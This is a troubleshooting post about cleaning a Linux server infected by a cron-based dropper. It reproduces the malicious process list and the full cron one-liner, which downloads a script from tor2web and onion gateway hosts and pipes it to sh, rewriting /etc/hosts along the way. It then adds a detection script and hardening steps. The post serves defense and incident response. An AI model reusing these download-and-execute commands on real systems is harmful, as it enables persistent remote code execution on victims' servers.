[Solved] an7kmd2wp4xo7hpr.tor2web.su Malicious Processes/Crons – Linux

1. Malicious Processes

A. Identify the suspicious processes and the hostname they contact; in the case below it is an7kmd2wp4xo7hpr.tor2web.su
B. Use the command ps aux

root 26561 0.0 0.0 139556 4392 ? S Aug20 0:00 wget --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /etc/cron.monthly/cron
root 28777 0.0 0.0 139556 4384 ? S Aug21 0:00 wget --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /etc/cron.monthly/cron
root 24990 0.0 0.0 106076 1380 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d
root 24991 0.0 0.0 106076 1380 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d
root 24992 0.0 0.0 106076 1376 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d

2. Malicious Crons

A. Now take the same hostname and grep for it across the whole server
B. The command is below
[[email protected] ~]# grep -rli an7kmd2wp4xo7hpr    /
/etc/cron.d/root
/etc/cron.monthly/cronlog
/etc/crontab

[[email protected] ~]# cat /etc/cron.d/root
*/7 * * * * root R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to <[email protected]>" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://an7kmd2wp4xo7hpr";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &

[[email protected] ~]# cat /etc/crontab
*/7 * * * * root R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to <[email protected]>" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://an7kmd2wp4xo7hpr";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &
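
The grep above only finds files that contain this one hostname. As an added example (not part of the original post), the script below generalizes the check to the traits visible in the cron line: the gateway domains it tries, a curl/wget download piped into a shell, and disabled TLS verification. The function names, the optional ROOT argument and the sample tree (constructed data with a placeholder host) are assumptions made for this example.

```shell
#!/bin/sh
# Added example: flag cron files showing the traits of the dropper in the post.
# Patterns (extended regex) are derived from the cron line shown above.
PAT_GATEWAY='tor2web|d2web\.org|onion\.sh|timesync\.su'   # gateway domains it tries
PAT_PIPE_SH='(curl|wget|\$G[12])[^;#]*[|][[:space:]]*(ba)?sh([[:space:];&)]|$)'  # download piped to a shell
PAT_NO_TLS='--no-check-certificate|--insecure'            # TLS verification disabled

# scan_cron [ROOT]: print "file: reasons" for each suspicious cron file.
# ROOT defaults to /; pass a prefix to scan a mounted image or a test tree.
scan_cron() {
    root=${1:-/}
    root=${root%/}
    for path in etc/crontab etc/cron.d etc/cron.hourly etc/cron.daily \
                etc/cron.weekly etc/cron.monthly var/spool/cron; do
        [ -e "$root/$path" ] || continue
        find "$root/$path" -type f 2>/dev/null
    done | while IFS= read -r f; do
        reasons=""
        if grep -Eqi -e "$PAT_GATEWAY" "$f" 2>/dev/null; then reasons="$reasons gateway"; fi
        if grep -Eq -e "$PAT_PIPE_SH" "$f" 2>/dev/null; then reasons="$reasons pipe-to-shell"; fi
        if grep -Eq -e "$PAT_NO_TLS" "$f" 2>/dev/null; then reasons="$reasons tls-off"; fi
        [ -z "$reasons" ] || printf '%s:%s\n' "$f" "$reasons"
    done
    return 0
}

# make_sample_tree DIR: constructed test data modelled on the post, not real host files.
make_sample_tree() {
    mkdir -p "$1/etc/cron.d" "$1/etc/cron.monthly"
    echo '0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf' > "$1/etc/crontab"
    cat > "$1/etc/cron.d/root" <<'EOF'
*/7 * * * * root H="https://EXAMPLEHOST";T1=".tor2web.su/";P="src/ldm";(curl -fsSLk $H$T1$P||wget --quiet --no-check-certificate $H$T1$P)|sh &
EOF
    echo '#!/bin/sh' > "$1/etc/cron.monthly/cron"
}
```

Run `scan_cron /` as root on the affected server, or point it at a mounted disk image; the patterns are heuristics, so review each flagged file by hand before deleting anything.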

 

Solutions:

A. Remove the malicious code from the cron files, or wherever else you find it, and for the time being make those files immutable with chattr as well
B. chattr +i /etc/cron.d/root ; chattr +i /etc/crontab
C.
- Change the root password immediately
- Remove all authorized keys, for all users, that are not yours

ls -lahd /home/*/.ssh/auth*
ls -lahd /root/.ssh/auth*

- ClamAV - Antivirus
- Maldet - Malware Detector
- Restricting SSH from particular IPs/VPN
- Restricting MySQL from particular IPs/VPN
- CSF Firewall
- LFD Login Failure Daemon
- WAF Web Application Firewall
- ModSecurity with HTTP/Apache
- Avoid using the MySQL root user's password in application code; create a non-root MySQL user instead.
- Proper permissions and ownership of code files, such as 755 for directories and 644 for files.
- Non-standard SSH port

 
